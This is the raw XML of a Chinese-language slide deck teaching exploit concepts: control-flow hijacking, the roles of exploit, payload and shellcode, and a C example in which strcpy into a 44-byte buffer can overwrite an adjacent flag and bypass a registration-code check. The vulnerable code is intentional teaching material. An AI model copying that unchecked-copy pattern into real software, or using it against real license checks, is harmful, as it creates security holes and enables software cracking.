                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>	return;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>}</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598087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59913471-79C0-4B60-AFDA-9776520A54ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="884759" y="1240061"/>
            <a:ext cx="11070801" cy="5184574"/>
            <a:chOff x="1263230" y="1989440"/>
            <a:chExt cx="10332290" cy="2465662"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="矩形: 圆角 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5E3EC1C-74FC-4C48-9D84-DA52DC0FBCE8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1263230" y="1989440"/>
              <a:ext cx="10332290" cy="2465662"/>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938C6252-55B6-42CE-98FC-347733AE6A0C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1666457" y="2229157"/>
              <a:ext cx="9712828" cy="1932102"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>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漏洞利用的核心就是利用程序漏洞去劫持进程的控制权，实现控制流劫持，以便执行植入的</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或者达到其它的攻击目的。</a:t>
              </a:r>
              <a:endPar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ts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:endPar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ts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pP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当攻击者掌握了被攻击程序的内存错误漏洞后，一般会考虑发起</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控制流劫持攻击</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。早期的攻击通常采用</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代码植入</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的方式，通过上载一段代码，将控制转向这段代码执行。在栈溢出漏洞的利用过程中，攻击的目的是</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淹没返回地址</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，以便劫持进程的控制权，让程序跳转去执行</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9" name="图片 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main"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13790" y="5488533"/>
            <a:ext cx="1619858" cy="1619858"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="组合 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CBA4C38-133D-4615-AA5C-4AB9BDE3F67A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4557167" y="533631"/>
            <a:ext cx="3625157" cy="474140"/>
            <a:chOff x="5202512" y="837929"/>
            <a:chExt cx="2453727" cy="474140"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="14" name="íślíḋè-Straight Connector 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97B97828-018C-46B1-9C84-9C38BF0C2B0C}"/>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2ECAD2EB-634C-448E-A94C-5E5E4A28D7DF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5637752" y="837929"/>
              <a:ext cx="1583247"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漏洞利用的核心</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="845205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59913471-79C0-4B60-AFDA-9776520A54ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="884759" y="2176165"/>
            <a:ext cx="11233248" cy="3744416"/>
            <a:chOff x="1263230" y="1989440"/>
            <a:chExt cx="10332290" cy="1986228"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="矩形: 圆角 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5E3EC1C-74FC-4C48-9D84-DA52DC0FBCE8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1263230" y="1989440"/>
              <a:ext cx="10332290" cy="1986228"/>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938C6252-55B6-42CE-98FC-347733AE6A0C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1572961" y="2023034"/>
              <a:ext cx="9712828" cy="1616277"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="200000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pP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要完成攻击，</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Exploit</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需要执行</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，但</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Exploit</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中并不仅是</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200000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                <a:buChar char="p"/>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Exploit</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要达到攻击目标，要做的工作更多，比如</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对应的触发漏洞、将控制权转移到</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一般均不相同，而且他们通常独立于</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的代码。</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200000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                <a:buChar char="p"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US"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能实现特定目标的</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN"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Exploit</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US"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的有效载荷，称为</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN"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Payload</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9" name="图片 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main"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13790" y="5488533"/>
            <a:ext cx="1619858" cy="1619858"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="组合 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CBA4C38-133D-4615-AA5C-4AB9BDE3F67A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4485159" y="880021"/>
            <a:ext cx="3625157" cy="474140"/>
            <a:chOff x="5202512" y="837929"/>
            <a:chExt cx="2453727" cy="474140"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="14" name="íślíḋè-Straight Connector 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97B97828-018C-46B1-9C84-9C38BF0C2B0C}"/>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2ECAD2EB-634C-448E-A94C-5E5E4A28D7DF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5748425" y="837929"/>
              <a:ext cx="1361904" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="non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Exploit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的结构</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2554055848"/>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13790" y="5488533"/>
            <a:ext cx="1619858" cy="1619858"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="组合 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CBA4C38-133D-4615-AA5C-4AB9BDE3F67A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4557167" y="533631"/>
            <a:ext cx="3625157" cy="474140"/>
            <a:chOff x="5202512" y="837929"/>
            <a:chExt cx="2453727" cy="474140"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="14" name="íślíḋè-Straight Connector 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97B97828-018C-46B1-9C84-9C38BF0C2B0C}"/>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2ECAD2EB-634C-448E-A94C-5E5E4A28D7DF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5748425" y="837929"/>
              <a:ext cx="1361904" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="non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Exploit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的结构</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1364718" y="4912469"/>
            <a:ext cx="9649072" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pP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Exploit</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是指利用漏洞进行攻击的动作；</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Shellcode</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用来实现具体的功能；</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Payload</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除了包含</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>shellcode</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之外，还需要考虑如何触发漏洞并让系统或者程序去执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>shellcode</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5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="973217" y="1672109"/>
            <a:ext cx="10793055" cy="2797048"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>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一个经典的比喻，将漏洞利用过程比作导弹发射的过程：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" u="sng" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" u="sng"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u="sng" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" u="sng"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400" b="1" u="sng" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" u="sng" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>分别是导弹发射装置、导弹和弹头</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Exploit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是导弹发生装置，针对目标发射导弹（</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payload</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）；导弹到达目标之后，释放实际危害的弹头（类似</a:t>
            </a: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shellcode</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）爆炸；导弹除了弹头之外的其余部分用来实现对目标进行定位追踪、对弹头引爆等功能，在漏洞利用中，对应</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payload</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的非</a:t>
            </a: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shellcode</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的部分。</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892565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316807" y="2968253"/>
            <a:ext cx="10297144" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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知识点二：覆盖临接变量示例</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1984223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a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF16C0EE-F047-4513-ABE9-3621ABC453F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2108895" y="1282153"/>
            <a:ext cx="8640960" cy="637540"/>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假设我们已知一个系统的注册机验证过程的漏洞，程序举例如下：</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" sz="20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2" name="组合 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13E81921-4694-4FCE-BEEB-D82105CA8807}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5421264" y="519981"/>
            <a:ext cx="2016224" cy="474140"/>
            <a:chOff x="5747023" y="837929"/>
            <a:chExt cx="1364703" cy="474140"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="23" name="íślíḋè-Straight Connector 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F32E12F4-9770-4CBB-86DA-6F7C3B2F93C5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5747023" y="1312069"/>
              <a:ext cx="1364703"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61E0A855-E6B3-407D-A621-CDD4F16176C0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6158556" y="837929"/>
              <a:ext cx="541637"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示例</a:t>
              </a:r>
              <a:endParaRPr lang="fr-FR"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 name="组合 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1BFEC09-C411-4C8D-A681-0E601F34CB12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2036887" y="2074241"/>
            <a:ext cx="8928992" cy="4701952"/>
            <a:chOff x="2468935" y="2717511"/>
            <a:chExt cx="7848872" cy="4283489"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="矩形 38">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00F0C464-4B74-4C62-A523-8B32ECC5EBC2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3060969" y="2750536"/>
              <a:ext cx="4720590" cy="4250464"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="just">
                <a:lnSpc>
                  <a:spcPct val="125000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>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#include &lt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" err="1">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>stdio.h</a:t>
              </a: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&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="just">
                <a:lnSpc>
                  <a:spcPct val="125000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>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#include &lt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" err="1">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>windows.h</a:t>
              </a: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&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="just">
                <a:lnSpc>
                  <a:spcPct val="125000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>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#define REGCODE "12345678"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="just">
                <a:lnSpc>
                  <a:spcPct val="125000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>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int verify (char * code){</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="just">
                <a:lnSpc>
                  <a:spcPct val="125000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>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int flag;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="just">
                <a:lnSpc>
                  <a:spcPct val="125000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>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char buffer[44];</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="just">
                <a:lnSpc>
                  <a:spcPct val="125000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>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flag=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" err="1">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>strcmp</a:t>
              </a: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(REGCODE, code);</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="just">
                <a:lnSpc>
                  <a:spcPct val="125000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>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100" dirty="0" err="1">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>strcpy</a:t>
              </a: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(buffer, code);</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="just">
                <a:lnSpc>
                  <a:spcPct val="125000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>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return flag; </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="just">
                <a:lnSpc>
                  <a:spcPct val="125000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>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4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矩形: 圆角 39">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49E36080-6564-45C2-B1A1-99CA69B89C25}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2468935" y="2717511"/>
              <a:ext cx="7848872" cy="4225618"/>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365421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UUID" val="{C1A8F295-47DC-48FB-81BD-666766343352}"/>
  <p:tag name="ISPRING_RESOURCE_FOLDER" val="E:\素材\正版图-卖\PPT\0变色龙\0包图网\bt369\ppt\bt369\"/>
  <p:tag name="ISPRING_PRESENTATION_PATH" val="E:\素材\正版图-卖\PPT\0变色龙\0包图网\bt369\ppt\bt369.pptx"/>
  <p:tag name="ISPRING_PROJECT_FOLDER_UPDATED" val="1"/>
  <p:tag name="ISPRING_SCREEN_RECS_UPDATED" val="E:\素材\正版图-卖\PPT\0变色龙\0包图网\bt369\ppt\bt369"/>
  <p:tag name="ISPRING_SCORM_ENDPOINT" val="&lt;endpoint&gt;&lt;enable&gt;0&lt;/enable&gt;&lt;lrs&gt;http://&lt;/lrs&gt;&lt;auth&gt;0&lt;/auth&gt;&lt;login&gt;&lt;/login&gt;&lt;password&gt;&lt;/password&gt;&lt;key&gt;&lt;/key&gt;&lt;name&gt;&lt;/name&gt;&lt;email&gt;&lt;/email&gt;&lt;/endpoint&gt;&#10;"/>
  <p:tag name="ISPRING_PRESENTATION_TITLE" val="bt1191"/>
</p:tagLst>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Office Theme">
  <a:themeElements>
    <a:clrScheme name="自定义 386">
      <a:dk1>
        <a:sysClr val="windowText" lastClr="000000"/>
      </a:dk1>
      <a:lt1>
        <a:sysClr val="window" lastClr="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="29ABE2"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="E7E6E6"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="29ABE2"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="C8C8C8"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="29ABE2"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="C8C8C8"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="29ABE2"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="C8C8C8"/>
      </a:accent6>
      <a:hlink>
